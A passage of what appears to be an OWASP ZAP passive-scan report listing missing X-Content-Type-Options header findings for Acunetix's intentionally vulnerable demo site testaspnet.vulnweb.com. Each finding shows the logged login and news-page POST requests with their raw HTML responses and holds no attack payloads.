href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Content-Length: 6507 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 6,507 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA%2BVGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E%2BLjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKP1p3RBAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH%2F%2FaNq1Q9scKgXRi5G
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 22875
